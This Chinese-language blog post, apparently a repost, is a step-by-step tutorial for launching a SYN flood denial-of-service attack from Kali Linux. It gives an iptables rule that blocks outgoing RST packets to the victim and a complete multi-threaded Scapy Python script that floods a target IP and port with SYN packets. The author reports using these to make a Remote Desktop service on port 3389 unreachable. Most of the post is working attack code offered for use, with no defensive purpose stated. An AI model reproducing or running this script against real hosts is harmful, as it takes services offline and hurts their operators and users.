当前位置:   article > 正文

Kali ddos/DDOS 拒绝服务攻击 syn-flood 洪泛/泛洪攻击_kaliddos攻击无效

kaliddos攻击无效

Syn洪泛攻击:

洪泛攻击的本质是不相应B回复的SYN+ACK,导致B一直占用其系统资源,迟迟不关闭,且定时发送给A一个SYN+ACK的包,攻击方A可以控制肉鸡向B发送大量SYN消息但不响应ACK消息,或者干脆伪造SYN消息中的Source IP,使B反馈的SYN-ACK消息石沉大海,导致B被大量注定不能完成的半开连接占据,直到资源耗尽,停止响应正常的连接请求。

开始:

修改防火墙配置

# 防火墙需要进行配置,阻止RST包发出

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.21.117 -j DROP

说明:发一个包释放一个连接,这种达不到攻击郊果。要构成攻击效果可以通过iptables限止发送RST包。

然后执行脚本(脚本内容在最下面 )

python3 syn_flood.py 受害者ip 受害者端口 数量为20

 效果:

这里攻击的是3389即远程桌面的端口,我们通过win10自带的去连接,发现连接失败

至此拒绝服务攻击-泛洪攻击完成

脚本内容:

环境是python3的环境

  1. #!/usr/bin/python
  2. from scapy.all import*
  3. from time import sleep
  4. import _thread
  5. import random
  6. import logging
  7. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  8. if len(sys.argv) != 4:
  9. print ("Usage - ./syn_flood.py [Target-IP] [Port Number]")
  10. print ("Example - ./sock_stress.py 10.0.0.5 80 20")
  11. print ("Example will perform a 20x multi-threaded SYN flood attack")
  12. print ("against the HTTP (port 80) service on 10.0.0.5")
  13. sys.exit()
  14. target = str(sys.argv[1])
  15. port= int(sys.argv[2])
  16. threads = int(sys.argv[3])
  17. print ("Performing SYN flood.Use Ctrl+C to stop attack")
  18. def synflood(target,port):
  19. while 0 == 0:
  20. x = random.randint(0,65535)
  21. send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)
  22. for x in range(0,threads):
  23. _thread.start_new_thread(synflood,(target,port))
  24. while 0 == 0:
  25. sleep(1)

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/人工智能uu/article/detail/896186
推荐阅读
相关标签
  

闽ICP备14008679号